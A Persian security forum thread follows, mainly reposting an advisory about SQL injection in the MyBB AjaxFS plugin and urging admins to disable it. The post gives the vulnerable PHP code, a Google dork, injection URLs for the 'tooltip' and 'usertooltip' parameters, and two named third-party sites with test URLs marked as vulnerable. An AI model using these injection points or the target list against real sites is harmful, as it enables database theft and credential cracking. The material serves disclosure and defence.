.:::: تاپیک آموزش امنیت و راههای مقابله با هک :::.

[MR.XpR]

رنج IP بدید مثلا :

<files index.php>
order allow,deny
allow from 198.168
</files>

---

اخیرا آسیب پذیری جدید برای پلاگین AJAX FS پابلیک شده که SQLI میباشد .

نفوذ گر با استفاده از این آسیب پذیری میتواند اطلاعات مدیریت را از دیتابیس استخراح نماید مثل یوزر و پسورد مدیریت :

کد:

###########################

# Mybb Ajaxfs Plugin Sql Injection vulnerability

###########################

#################################
#
#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@            @@@  @@@@@@@
#     @@@    @@@@@@@@@@@    @@@  @@         @@@     @@            @@@  @@@@@@@@
#     @@@    @@@            @@@    @@       @@@       @@          @@@  @@@  @@@
#     @@@    @@@            @@@      @@     @@@     @@            @@@  @@@  @@@
#     @@@    @@@@@@@@@@@    @@@       @     @@@@@@@@@@            @@@  @@@@@@
#     @@@    @@@@@@@@@@@    @@@     @@      @@@     @@            @@@  @@@@@@
#     @@@    @@@            @@@   @@        @@@       @@   @@@    @@@  @@@ @@@
#     @@@    @@@            @@@ @@          @@@     @@     @@@    @@@  @@@  @@@
#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@     @@@    @@@  @@@   @@@
#
#####################################
  
# Exploit Title : Mybb Ajaxfs Plugin Sql Injection vulnerability
  
# Author : Iranian Exploit DataBase
  
# Discovered By : IeDb
  
# Email : [email protected]  -  [email protected]
  
# Home : http://iedb.ir   -   http://iedb.ir/acc
  
# Fb Page : https://www.facebook.com/pages/Exploit-And-Security-Team-iedbir/199266860256538
  
# Software Link : http://mods.mybb.com/download/ajax-forum-stat-v-2
  
# Security Risk : High
  
# Tested on : Linux
  
# Dork : inurl:ajaxfs.php
  
#################################
  
1)
  
  if(isset($_GET['tooltip']))
    {
    $pid=$_GET['tooltip'];
    $query_post = $db->query ("SELECT * FROM ".TABLE_PREFIX."posts WHERE pid='$pid'");
  
  
2)
  
if(isset($_GET['usertooltip']))
    {
    $uid=$_GET['usertooltip'];
    $query_user = $db->query ("SELECT * FROM ".TABLE_PREFIX."users WHERE uid='$uid'");
  
http://localhost/Upload/ajaxfs.php?usertooltip=1'
  
    1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
  
Google DORK : inurl:ajaxfs.php
  
  
# Exploit :
  
# http://site.com/mybb/ajaxfs.php?tooltip=[sql]
  
# http://site.com/mybb/ajaxfs.php?usertooltip=[sql]
  
  
#################################
  
# Tnx To : All Member In Iedb.ir/acc & Iranian Hackers
  
#################################

هر چند از ثبت کننده این آسیب پذیری خیلی خوشم نمیاد اما آسیب پذیری هست که پابلیک شده و وظیفه ما ایجاب میکنه برای وبسایت های ایرانی اطلاع رسانی انجام بدیم .

لینک پلاگین از سایت مرجع :

http://mods.mybb.com/download/ajax-forum-stat-v-2

لینک اکسپلویت در سایت Exploit-DB :

http://www.exploit-db.com/exploits/29797

دموی نفوذ به وبسایت از طریق این آسیب پذیری :

https://www.youtube.com/watch?v=8BrqkHwMr6c

از جمله از وبسایت هایی که از این پلاگین استفاده میکنند و آسیب پذیر میباشند :

http://forum.kardoonline.com/ajaxfs.php?tooltip=939%27
http://airguns-club.ir/ajaxfs.php?tooltip=805%27
و .....

اگر صفحات لاگین باز باشد با استخراج یوزر و پسورد هکر میتوانید با کرک کردن هش به سایت دسترسی پیدا کند . و البته از طریق اینجکشن میشه کل دیتابیس را Dump کرد .

جهت پیشگیری از این حملات فعلا این پلاگین تا ارائه نسخه جدید غیر فعال شود دوستانی هم که احتیاج دارند بهش میتونند توی پیام خصوصی اعلام کنند تا آسیب پذیری براشون پچ بشه .

یا حق